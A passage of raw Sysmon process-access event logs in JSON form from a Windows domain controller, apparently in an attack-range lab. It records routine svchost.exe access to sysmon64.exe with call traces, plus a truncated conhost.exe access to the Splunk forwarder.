C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010D17B0500}\r\nTargetProcessId: 4860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 